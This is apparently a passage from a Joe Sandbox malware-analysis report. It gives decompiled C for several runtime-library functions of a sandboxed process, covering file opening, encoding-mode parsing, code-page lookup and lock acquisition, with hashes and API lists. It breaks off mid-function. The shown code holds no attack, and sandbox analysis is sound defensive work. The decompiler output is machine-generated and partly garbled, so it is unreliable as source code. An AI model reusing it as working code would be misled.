                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                          • String ID:
                                                          • API String ID: 43408053-0
                                                          • Opcode ID: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction ID: 9e8aab5806c284d91b9b5f50a4a9beef4495bb816137996ca4eef90094ce3e9b
                                                          • Opcode Fuzzy Hash: 2e04a13d24654045013decf1bdae54fbc133757c4ac394d5a4645ba2a096ef4b
                                                          • Instruction Fuzzy Hash: E4212B319195106ACB21DBB8DE157E87F545F81334F28C718E8B15B2E3C7389B06AB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 80%
                                                          			E009A2695(void* __eax, signed char __ecx, signed int __edx, signed int* __edi) {
                                                          				intOrPtr _t33;
                                                          				intOrPtr _t36;
                                                          				intOrPtr _t48;
                                                          				signed char _t50;
                                                          				signed char _t63;
                                                          				signed int _t65;
                                                          				signed int _t67;
                                                          				signed int* _t68;
                                                          				void* _t73;
                                                          				void* _t80;
                                                          
                                                          				_t68 = __edi;
                                                          				_t50 = __ecx;
                                                          				_t63 = __edx ^ __edx;
                                                          				asm("pushfd");
                                                          				_t1 = _t63 + 0x24243244;
                                                          				 *_t1 =  *((intOrPtr*)(_t63 + 0x24243244)) + __ecx;
                                                          				if( *_t1 <= 0) {
                                                          					asm("enter 0x4c88, 0x32");
                                                          					_t80 = _t73 - 1;
                                                          					asm("adc al, 0x38");
                                                          					_pop(_t73);
                                                          				}
                                                          				asm("std");
                                                          				if(_t80 == 0 && (_t50 & 0x00000008) != 0) {
                                                          					 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) | 0x00000020;
                                                          					_t50 =  *(_t73 + 0x14);
                                                          				}
                                                          				_t70 =  *(_t73 - 8);
                                                          				if(( *(_t73 - 8) & 0xc0000000) == 0xc0000000) {
                                                          					_t84 = _t50 & 0x00000001;
                                                          					if((_t50 & 0x00000001) != 0) {
                                                          						CloseHandle( *(_t73 - 0x1c));
                                                          						_t36 = E009B23DE(_t50, _t84,  *((intOrPtr*)(_t73 + 0x10)), _t70 & 0x7fffffff,  *((intOrPtr*)(_t73 - 0xc)), _t73 - 0x38, 3,  *((intOrPtr*)(_t73 - 0x18)),  *((intOrPtr*)(_t73 - 0x10)));
                                                          						if(_t36 != 0xffffffff) {
                                                          							_t65 =  *_t68;
                                                          							_t67 = (_t65 & 0x0000001f) << 6;
                                                          							__eflags = _t67;
                                                          							 *((intOrPtr*)(_t67 +  *((intOrPtr*)(0x9cf230 + (_t65 >> 5) * 4)))) = _t36;
                                                          						} else {
                                                          							E009AF0DF(GetLastError());
                                                          							 *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) =  *( *((intOrPtr*)(0x9cf230 + ( *_t68 >> 5) * 4)) + (( *_t68 & 0x0000001f) << 6) + 4) & 0x000000fe;
                                                          							E009B3BAF( *_t68);
                                                          							_t48 =  *((intOrPtr*)(E009AF100()));
                                                          						}
                                                          					}
                                                          				}
                                                          				_t33 = _t48;
                                                          				return _t33;
                                                          			}

                                                          APIs
                                                          • CloseHandle.KERNEL32(?), ref: 009B2CDE
                                                          • ___createFile.LIBCMT ref: 009B2CFD
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B2D0A
                                                          • __dosmaperr.LIBCMT ref: 009B2D11
                                                          • __free_osfhnd.LIBCMT ref: 009B2D31
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorFileHandleLast___create__dosmaperr__free_osfhnd
                                                          • String ID:
                                                          • API String ID: 1832824508-0
                                                          • Opcode ID: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction ID: 51bb2f7f9d771b055be6b00e6ef8734223032a922ed6864034bb30c536be8733
                                                          • Opcode Fuzzy Hash: ebfef6d7fe2523746f2376dd0dd6234c98734da68e2d6faa07b1d551e8c7d4d6
                                                          • Instruction Fuzzy Hash: 0811763192010A5FCB0A8F64EF54AEDBF26FB44370F288218F961572E2CB228D11D780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 45%
                                                          			E00A253A5(signed int _a4, char _a8) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t32;
                                                          				signed int _t37;
                                                          				signed int _t40;
                                                          				signed int _t42;
                                                          				void* _t45;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				signed int _t49;
                                                          				void* _t51;
                                                          				signed int _t57;
                                                          				signed int _t64;
                                                          				signed int _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t78;
                                                          				signed int* _t79;
                                                          				void* _t85;
                                                          				signed int _t86;
                                                          				signed int _t92;
                                                          				void* _t104;
                                                          				void* _t105;
                                                          
                                                          				_t64 = _a4;
                                                          				_t32 =  *(_t64 + 0x28);
                                                          				_t71 = _t64 + 0x28;
                                                          				_push(_t92);
                                                          				if(_t32 < 0) {
                                                          					_t78 =  *[fs:0x18];
                                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                          						goto L3;
                                                          					} else {
                                                          						__eflags = _t32 | 0xffffffff;
                                                          						asm("lock xadd [ecx], eax");
                                                          						return 1;
                                                          					}
                                                          				} else {
                                                          					L3:
                                                          					_push(_t86);
                                                          					while(1) {
                                                          						L4:
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							break;
                                                          						}
                                                          						__eflags = _a8;
                                                          						if(_a8 == 0) {
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                          							_t79 = _t64 + 0x24;
                                                          							_t71 = 1;
                                                          							asm("lock xadd [eax], ecx");
                                                          							_t32 =  *(_t64 + 0x28);
                                                          							_a4 = _t32;
                                                          							__eflags = _t32;
                                                          							if(_t32 != 0) {
                                                          								L19:
                                                          								_t86 = 0;
                                                          								__eflags = 0;
                                                          								while(1) {
                                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                          									asm("sbb esi, esi");
                                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ae01c0;
                                                          									_push(_t92);
                                                          									_push(0);
                                                          									_t37 = L009FF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                          									__eflags = _t37 - 0x102;
                                                          									if(_t37 != 0x102) {
                                                          										break;
                                                          									}
                                                          									_t71 =  *(_t92 + 4);
                                                          									_t85 =  *_t92;
                                                          									_t51 = L00A44FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                          									_push(_t85);
                                                          									_push(_t51);
                                                          									L00A53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                          									L00A53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                          									_t86 = _t86 + 1;
                                                          									_t105 = _t104 + 0x28;
                                                          									__eflags = _t86 - 2;
                                                          									if(__eflags > 0) {
                                                          										E00A8217A(_t71, __eflags, _t64);
                                                          									}
                                                          									_push("RTL: Re-Waiting\n");
                                                          									_push(0);
                                                          									_push(0x65);
                                                          									L00A53F92();
                                                          									_t104 = _t105 + 0xc;
                                                          								}
                                                          								__eflags = _t37;
                                                          								if(__eflags < 0) {
                                                          									_push(_t37);
                                                          									L00A43915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                          									asm("int3");
                                                          									_t40 =  *_t71;
                                                          									 *_t71 = 0;
                                                          									__eflags = _t40;
                                                          									if(_t40 == 0) {
                                                          										L1:
                                                          										_t42 = E00A25384(_t92 + 0x24);
                                                          										if(_t42 != 0) {
                                                          											goto L31;
                                                          										} else {
                                                          											goto L2;
                                                          										}
                                                          									} else {
                                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                          										_push( &_a4);
                                                          										_push(_t40);
                                                          										_t49 = L009FF970( *((intOrPtr*)(_t92 + 0x18)));
                                                          										__eflags = _t49;
                                                          										if(__eflags >= 0) {
                                                          											goto L1;
                                                          										} else {
                                                          											_push(_t49);
                                                          											L00A43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                          											L31:
                                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                          											_push( &_a4);
                                                          											_push(1);
                                                          											_t42 = L009FF970( *((intOrPtr*)(_t92 + 0x20)));
                                                          											__eflags = _t42;
                                                          											if(__eflags >= 0) {
                                                          												L2:
                                                          												return _t42;
                                                          											} else {
                                                          												_push(_t42);
                                                          												L00A43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                          												_push( &_a4);
                                                          												_push(1);
                                                          												_t42 = L009FF970( *((intOrPtr*)(_t92 + 0x20)));
                                                          												__eflags = _t42;
                                                          												if(__eflags >= 0) {
                                                          													goto L2;
                                                          												} else {
                                                          													_push(_t42);
                                                          													_t45 = L00A43915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                          													asm("int3");
                                                          													while(1) {
                                                          														_t74 = _t45;
                                                          														__eflags = _t45 - 1;
                                                          														if(_t45 != 1) {
                                                          															break;
                                                          														}
                                                          														_t86 = _t86 | 0xffffffff;
                                                          														_t45 = _t74;
                                                          														asm("lock cmpxchg [ebx], edi");
                                                          														__eflags = _t45 - _t74;
                                                          														if(_t45 != _t74) {
                                                          															continue;
                                                          														} else {
                                                          															_t46 =  *[fs:0x18];
                                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                          															return _t46;
                                                          														}
                                                          														goto L38;
                                                          													}
                                                          													E00A25329(_t74, _t92);
                                                          													_push(1);
                                                          													_t48 = E00A253A5(_t92);
                                                          													return _t48;
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								} else {
                                                          									_t32 =  *(_t64 + 0x28);
                                                          									continue;
                                                          								}
                                                          							} else {
                                                          								_t71 =  *_t79;
                                                          								__eflags = _t71;
                                                          								if(__eflags > 0) {
                                                          									while(1) {
                                                          										_t57 = _t71;
                                                          										asm("lock cmpxchg [edi], esi");
                                                          										__eflags = _t57 - _t71;
                                                          										if(_t57 == _t71) {
                                                          											break;
                                                          										}
                                                          										_t71 = _t57;
                                                          										__eflags = _t57;
                                                          										if(_t57 > 0) {
                                                          											continue;
                                                          										}
                                                          										break;
                                                          									}
                                                          									_t32 = _a4;
                                                          									__eflags = _t71;
                                                          								}
                                                          								if(__eflags != 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L19;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L38;
                                                          					}
                                                          					_t71 = _t71 | 0xffffffff;
                                                          					_t32 = 0;
                                                          					asm("lock cmpxchg [edx], ecx");
                                                          					__eflags = 0;
                                                          					if(0 != 0) {
                                                          						goto L4;
                                                          					} else {
                                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                          						return 1;
                                                          					}
                                                          				}
                                                          				L38:
                                                          			}

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A622F4
                                                          Strings
                                                          • RTL: Resource at %p, xrefs: 00A6230B
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A622FC
                                                          • RTL: Re-Waiting, xrefs: 00A62328
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-871070163
                                                          • Opcode ID: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
                                                          • Instruction ID: 7d1571415ac6767f3a22ae583c004702df8c3d617255b4f76b8782008896cab5
                                                          • Opcode Fuzzy Hash: d91f380c0cdfbacbffa5edbed0ea93acac1753b2b53054029ee1762f9ff3e026
                                                          • Instruction Fuzzy Hash: 36511772A00A156BDF11DB38DC91FA673A8BF98364F104229FD15DF281EA71ED418B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 99%
                                                          			E009A696E(signed int __eax, signed int __ebx, void* __ecx, void* __edx, signed int __edi, signed int __esi) {
                                                          				signed int _t34;
                                                          				signed short _t35;
                                                          				void* _t37;
                                                          				intOrPtr* _t41;
                                                          				void* _t44;
                                                          				void* _t45;
                                                          				void* _t46;
                                                          				void* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				void* _t51;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				signed int _t56;
                                                          				void* _t59;
                                                          				void* _t62;
                                                          				signed int _t63;
                                                          				signed int _t66;
                                                          				intOrPtr* _t68;
                                                          				void* _t69;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          
                                                          				_t66 = __esi;
                                                          				_t63 = __edi;
                                                          				_t62 = __edx;
                                                          				_t59 = __ecx;
                                                          				_t56 = __ebx;
                                                          				_t34 = __eax;
                                                          				while(1) {
                                                          					asm("rol byte [ebx-0x70f0ac08], 0x8a");
                                                          					 *_t34 =  *_t34 + _t34;
                                                          					_t1 = _t66 + _t66 * 2 - 0x7d;
                                                          					 *_t1 =  *((intOrPtr*)(_t66 + _t66 * 2 - 0x7d)) + _t62;
                                                          					_t75 =  *_t1;
                                                          					if(_t75 == 0) {
                                                          						if( *((intOrPtr*)(_t69 - 4)) != 0) {
                                                          							goto L37;
                                                          						} else {
                                                          							 *((intOrPtr*)(_t69 - 4)) = 1;
                                                          							_t56 = _t56 | 0x00000020;
                                                          						}
                                                          						goto L39;
                                                          					} else {
                                                          						_t50 = _t34 - 0x20;
                                                          						if(_t50 == 0) {
                                                          							L39:
                                                          							_t66 = _t66 + 2;
                                                          							_t35 =  *_t66 & 0x0000ffff;
                                                          							if(_t35 != 0) {
                                                          								if(_t59 == 0) {
                                                          									goto L40;
                                                          								} else {
                                                          									_t34 = _t35 & 0x0000ffff;
                                                          									continue;
                                                          								}
                                                          							} else {
                                                          								L40:
                                                          								if( *((intOrPtr*)(_t69 - 8)) == 0) {
                                                          									L56:
                                                          									_t37 = 0x20;
                                                          									while( *_t66 == _t37) {
                                                          										_t66 = _t66 + 2;
                                                          									}
                                                          									if( *_t66 != 0) {
                                                          										goto L1;
                                                          									} else {
                                                          										if(E009B2D65(_t69 + 0xc,  *((intOrPtr*)(_t69 + 8)), _t56,  *((intOrPtr*)(_t69 + 0x10)), 0x180) != 0) {
                                                          											goto L2;
                                                          										} else {
                                                          											_t41 =  *((intOrPtr*)(_t69 + 0x14));
                                                          											 *0x9cf1ec =  *0x9cf1ec + 1;
                                                          											 *((intOrPtr*)(_t41 + 4)) = 0;
                                                          											 *_t41 = 0;
                                                          											 *((intOrPtr*)(_t41 + 8)) = 0;
                                                          											 *((intOrPtr*)(_t41 + 0x1c)) = 0;
                                                          											 *(_t41 + 0xc) = _t63;
                                                          											 *((intOrPtr*)(_t41 + 0x10)) =  *((intOrPtr*)(_t69 + 0xc));
                                                          										}
                                                          									}
                                                          								} else {
                                                          									_t44 = 0x20;
                                                          									while( *_t66 == _t44) {
                                                          										_t66 = _t66 + 2;
                                                          									}
                                                          									_t45 = E009B2D83("ccs", _t66, 3);
                                                          									_t74 = _t71 + 0xc;
                                                          									if(_t45 != 0) {
                                                          										goto L1;
                                                          									} else {
                                                          										_t68 = _t66 + 6;
                                                          										_t46 = 0x20;
                                                          										while( *_t68 == _t46) {
                                                          											_t68 = _t68 + 2;
                                                          										}
                                                          										if( *_t68 != 0x3d) {
                                                          											goto L1;
                                                          										} else {
                                                          											do {
                                                          												_t68 = _t68 + 2;
                                                          											} while ( *_t68 == _t46);
                                                          											_t47 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-8", 5);
                                                          											_t71 = _t74 + 0xc;
                                                          											if(_t47 != 0) {
                                                          												_t48 = E009B2E52(_t56, _t59, _t68, _t68, L"UTF-16LE", 8);
                                                          												_t71 = _t71 + 0xc;
                                                          												if(_t48 != 0) {
                                                          													_t49 = E009B2E52(_t56, _t59, _t68, _t68, L"UNICODE", 7);
                                                          													_t71 = _t71 + 0xc;
                                                          													if(_t49 != 0) {
                                                          														goto L1;
                                                          													} else {
                                                          														_t66 = _t68 + 0xe;
                                                          														_t56 = _t56 | 0x00010000;
                                                          														goto L56;
                                                          													}
                                                          												} else {
                                                          													_t66 = _t68 + 0x10;
                                                          													_t56 = _t56 | 0x00020000;
                                                          													goto L56;
                                                          												}
                                                          											} else {
                                                          												_t66 = _t68 + 0xa;
                                                          												_t56 = _t56 | 0x00040000;
                                                          												goto L56;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t51 = _t50 - 0xb;
                                                          							if(_t51 == 0) {
                                                          								if((_t56 & 0x00000002) != 0) {
                                                          									goto L37;
                                                          								} else {
                                                          									_t56 = _t56 & 0xfffffffe | 0x00000002;
                                                          									_t63 = _t63 & 0xfffffffc | 0x00000080;
                                                          								}
                                                          								goto L39;
                                                          							} else {
                                                          								_t52 = _t51 - 1;
                                                          								if(_t52 == 0) {
                                                          									 *((intOrPtr*)(_t69 - 8)) = 1;
                                                          									goto L37;
                                                          								} else {
                                                          									_t53 = _t52 - 0x18;
                                                          									if(_t53 == 0) {
                                                          										if((_t56 & 0x00000040) != 0) {
                                                          											goto L37;
                                                          										} else {
                                                          											_t56 = _t56 | 0x00000040;
                                                          										}
                                                          										goto L39;
                                                          									} else {
                                                          										_t54 = _t53 - 0xa;
                                                          										if(_t54 == 0) {
                                                          											_t56 = _t56 | 0x00000080;
                                                          											goto L39;
                                                          										} else {
                                                          											_t55 = _t54 - 4;
                                                          											if(_t55 != 0) {
                                                          												L1:
                                                          												 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          												E009AEB1E();
                                                          												L2:
                                                          												_t41 = 0;
                                                          											} else {
                                                          												if( *((intOrPtr*)(_t69 - 4)) != _t55) {
                                                          													L37:
                                                          													_t59 = 0;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t69 - 4)) = 1;
                                                          													_t56 = _t56 | 0x00000010;
                                                          												}
                                                          												goto L39;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					L62:
                                                          					return _t41;
                                                          					__eax = __eax - 0x54;
                                                          					if(__eax == 0) {
                                                          						__eax =  *(__ebp + 0xc);
                                                          						if((__eax & __ebx) == 0) {
                                                          							__ebx = __ebx | __eax;
                                                          						} else {
                                                          							goto L37;
                                                          						}
                                                          						goto L39;
                                                          					} else {
                                                          						__eax = __eax - 0xe;
                                                          						if(__eax == 0) {
                                                          							if((__ebx & 0x0000c000) != 0) {
                                                          								goto L37;
                                                          							} else {
                                                          								__ebx = __ebx | 0x00008000;
                                                          							}
                                                          							goto L39;
                                                          						} else {
                                                          							__eax = __eax - 1;
                                                          							if(__eax == 0) {
                                                          								if(__edx != 0) {
                                                          									goto L37;
                                                          								} else {
                                                          									__edx = __edx + 1;
                                                          									__edi = __edi | 0x00004000;
                                                          								}
                                                          								goto L39;
                                                          							} else {
                                                          								__eax = __eax - 0xb;
                                                          								if(__eax == 0) {
                                                          									if(__edx != 0) {
                                                          										goto L37;
                                                          									} else {
                                                          										__edx = __edx + 1;
                                                          										__edi = __edi & 0xffffbfff;
                                                          									}
                                                          									goto L39;
                                                          								} else {
                                                          									__eax = __eax - 6;
                                                          									if(__eax != 0) {
                                                          										goto L1;
                                                          									} else {
                                                          										if((__ebx & 0x0000c000) != 0) {
                                                          											goto L37;
                                                          										} else {
                                                          											__ebx = __ebx | 0x00004000;
                                                          										}
                                                          										goto L39;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L62;
                                                          				}
                                                          			}

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$__sopen_s
                                                          • String ID: UTF-8$ccs
                                                          • API String ID: 857951187-3758431669
                                                          • Opcode ID: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction ID: 4b2e69dc4f78fac0a1503b9ee42290595fd844123da3f70e22aeeef58802cad3
                                                          • Opcode Fuzzy Hash: db2f554435ca04a75f020ee2e4c4606d0048b18236ed2baf28174d5f5dd925d2
                                                          • Instruction Fuzzy Hash: 0031F772D043529EEB305F649C04A697BA8DB17354F24886FE845DB1C2E670CD80C7E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E009BE04E(void* __eax, void* __edx, char _a4, intOrPtr _a8) {
                                                          				intOrPtr _t15;
                                                          				short* _t30;
                                                          
                                                          				_t30 = _a4;
                                                          				if(_t30 != 0 &&  *_t30 != 0) {
                                                          					_push("ACP");
                                                          					 *((intOrPtr*)(_t30 - 0x18)) =  *((intOrPtr*)(_t30 - 0x18)) + __edx;
                                                          					if(__eax != 0) {
                                                          						if(E009BDB28(0x59fffffa, ?str?) != 0) {
                                                          							return E009BEFC5(0x59fffffa);
                                                          						}
                                                          						if(E009B9FDB(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
                                                          							L10:
                                                          							return 0;
                                                          						}
                                                          						return _a4;
                                                          					}
                                                          				}
                                                          				if(E009B9FDB(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
                                                          					goto L10;
                                                          				}
                                                          				_t15 = _a4;
                                                          				if(_t15 == 0) {
                                                          					return GetACP();
                                                          				}
                                                          				return _t15;
                                                          			}

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 856254489-711371036
                                                          • Opcode ID: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction ID: 68469801770710b5232a3fc01aca10e9955a910c6a7855087d04a112b364d74a
                                                          • Opcode Fuzzy Hash: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction Fuzzy Hash: C401D83664921DBAEB24BA68DE42FE6339CDF40375F048815FE08D6181F7B4D94083D6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009BA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v20;
                                                          				signed int _t35;
                                                          				int _t38;
                                                          				signed int _t41;
                                                          				int _t42;
                                                          				intOrPtr* _t44;
                                                          				int _t47;
                                                          				short* _t49;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				int _t55;
                                                          				signed int _t59;
                                                          				char* _t62;
                                                          
                                                          				_t62 = _a8;
                                                          				if(_t62 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t50 = _a12;
                                                          				if(_t50 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if( *_t62 != 0) {
                                                          					E009B2DB9( &_v20, _a16);
                                                          					_t35 = _v20;
                                                          					__eflags =  *(_t35 + 0xa8);
                                                          					if( *(_t35 + 0xa8) != 0) {
                                                          						_t38 = E009BA1C7( *_t62 & 0x000000ff,  &_v20);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							__eflags = _a4;
                                                          							_t41 = _v20;
                                                          							_t59 = 1;
                                                          							_t28 = _t41 + 4; // 0x840ffff8
                                                          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                          							__eflags = _t42;
                                                          							if(_t42 != 0) {
                                                          								L21:
                                                          								__eflags = _v8;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
                                                          									_t31 = _t54 + 0x70;
                                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                          									__eflags =  *_t31;
                                                          								}
                                                          								return _t59;
                                                          							}
                                                          							L20:
                                                          							_t44 = E009AF100();
                                                          							_t59 = _t59 | 0xffffffff;
                                                          							__eflags = _t59;
                                                          							 *_t44 = 0x2a;
                                                          							goto L21;
                                                          						}
                                                          						_t59 = _v20;
                                                          						__eflags =  *(_t59 + 0x74) - 1;
                                                          						if( *(_t59 + 0x74) <= 1) {
                                                          							L15:
                                                          							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                                          							__eflags = _t50 -  *_t20;
                                                          							L16:
                                                          							if(__eflags < 0) {
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t62[1];
                                                          							if(_t62[1] == 0) {
                                                          								goto L20;
                                                          							}
                                                          							L18:
                                                          							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                                          							_t59 =  *_t22;
                                                          							goto L21;
                                                          						}
                                                          						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                                          						__eflags = _t50 -  *_t12;
                                                          						if(__eflags < 0) {
                                                          							goto L16;
                                                          						}
                                                          						__eflags = _a4;
                                                          						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                                          						_t18 = _t59 + 4; // 0x840ffff8
                                                          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                          						_t59 = _v20;
                                                          						__eflags = _t47;
                                                          						if(_t47 != 0) {
